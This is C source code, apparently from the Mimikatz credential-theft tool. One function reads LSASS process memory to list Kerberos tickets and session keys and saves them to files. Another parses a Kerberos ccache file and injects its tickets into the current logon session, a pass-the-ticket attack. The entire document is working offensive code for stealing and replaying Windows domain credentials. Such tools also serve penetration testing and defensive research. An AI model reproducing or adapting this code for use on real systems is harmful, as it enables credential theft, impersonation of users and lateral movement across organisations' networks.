void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile)
{
PVOID pStruct, pRef = tickets;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem};
DWORD nbTickets = 0;
PKIWI_KERBEROS_TICKET pKiwiTicket;
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
BOOL isNormalSessionKey;
wchar_t * filename;
if(aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize))
{
if(kull_m_memory_copy(&data, &aLsassBuffer, sizeof(PVOID)))
{
data.address = pStruct;
data.hMemory = pData->cLsass->hLsassMem;
while(data.address != pRef)
{
if(kull_m_memory_copy(&aTicket, &data, kerbHelper[KerbOffsetIndex].structTicketSize))
{
kprintf(L"\n\t [%08x]", nbTickets);
if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem))
{
isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data));
kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE);
if(isFile)
if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT))
{
if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket, FALSE))
{
if(kull_m_file_writeData(filename, App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
kprintf(L"\n\t * Saved to file %s !", filename);
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
LocalFree(App_KrbCred);
}
LocalFree(filename);
}
if(!isNormalSessionKey)
{
kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value);
}
kuhl_m_kerberos_ticket_freeTicket(pKiwiTicket);
}
data.address = ((PLIST_ENTRY) (aTicket.address))->Flink;
}
else break;
nbTickets++;
}
}
LocalFree(aTicket.address);
}
}
NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave)
{
PBYTE file, data;
DWORD length, i;
USHORT version;
PKERB_EXTERNAL_NAME principalName; UNICODE_STRING principalRealm;
PKIWI_KERBEROS_TICKET ticket;
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
DWORD App_KrbCred_Size;
wchar_t * saveFilename;
if(argc)
{
if(kull_m_file_readData(argv[0], &file, &length))
{
data = file;
version = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
if(version == 0x0504)
{
data += sizeof(USHORT) + _byteswap_ushort(*(PUSHORT) data);
kuhl_m_kerberos_ccache_externalname(&data, &principalName, &principalRealm);
if(principalName)
{
kuhl_m_kerberos_ticket_displayExternalName(L"\nPrincipal : ", principalName, &principalRealm);
for(i = 0; data < (file + length); i++)
{
kprintf(L"\n\nData %u", i);
if(ticket = (PKIWI_KERBEROS_TICKET) LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET)))
{
kuhl_m_kerberos_ccache_externalname(&data, &ticket->ClientName, &ticket->AltTargetDomainName);
kuhl_m_kerberos_ccache_externalname(&data, &ticket->ServiceName, &ticket->DomainName);
ticket->TargetName = kuhl_m_kerberos_ticket_copyExternalName(ticket->ServiceName);
kull_m_string_copyUnicodeStringBuffer(&ticket->DomainName, &ticket->TargetDomainName);
ticket->KeyType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
ticket->TicketEncType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
ticket->Key.Length = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
if(ticket->Key.Length)
if(ticket->Key.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Key.Length))
RtlCopyMemory(ticket->Key.Value, data, ticket->Key.Length);
data += ticket->Key.Length + sizeof(DWORD); // authtime;
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->StartTime); data += sizeof(DWORD); // local ?
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->EndTime); data += sizeof(DWORD);
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->RenewUntil); data += sizeof(DWORD) + sizeof(UCHAR); // skey
ticket->TicketFlags = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD);
kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // address
kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // authdata
ticket->Ticket.Length = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD);
ticket->TicketKvno = 2;
if(ticket->Ticket.Length)
if(ticket->Ticket.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Ticket.Length))
RtlCopyMemory(ticket->Ticket.Value, data, ticket->Ticket.Length);
data += ticket->Ticket.Length;
kuhl_m_kerberos_ccache_skip_buffer(&data);
if(!RtlEqualUnicodeString(&usXCACHECONF, &ticket->TargetDomainName, TRUE))
{
kuhl_m_kerberos_ticket_display(ticket, FALSE);
if(isSave || isInject)
{
if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(ticket, TRUE))
{
App_KrbCred_Size = kull_m_asn1_getSize(App_KrbCred);
if(isInject)
{
kprintf(L"\n\t * Injecting ticket : ");
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(App_KrbCred, App_KrbCred_Size)))
kprintf(L"OK\n");
}
else
{
if(saveFilename = kuhl_m_kerberos_ccache_generateFileName(i, ticket, MIMIKATZ_KERBEROS_EXT))
{
if(kull_m_file_writeData(saveFilename, App_KrbCred, App_KrbCred_Size))
kprintf(L"\n\t * Saved to file %s !", saveFilename);
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
LocalFree(saveFilename);
}
}
LocalFree(App_KrbCred);
}
}
}
else kprintf(L"\n\t* %wZ entry? *", &usXCACHECONF);
kuhl_m_kerberos_ticket_freeTicket(ticket);
}
}
kuhl_m_kerberos_ticket_freeExternalName(principalName);
}
}
else PRINT_ERROR(L"ccache version != 0x0504\n");
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"At least one filename is needed\n");
return STATUS_SUCCESS;
}
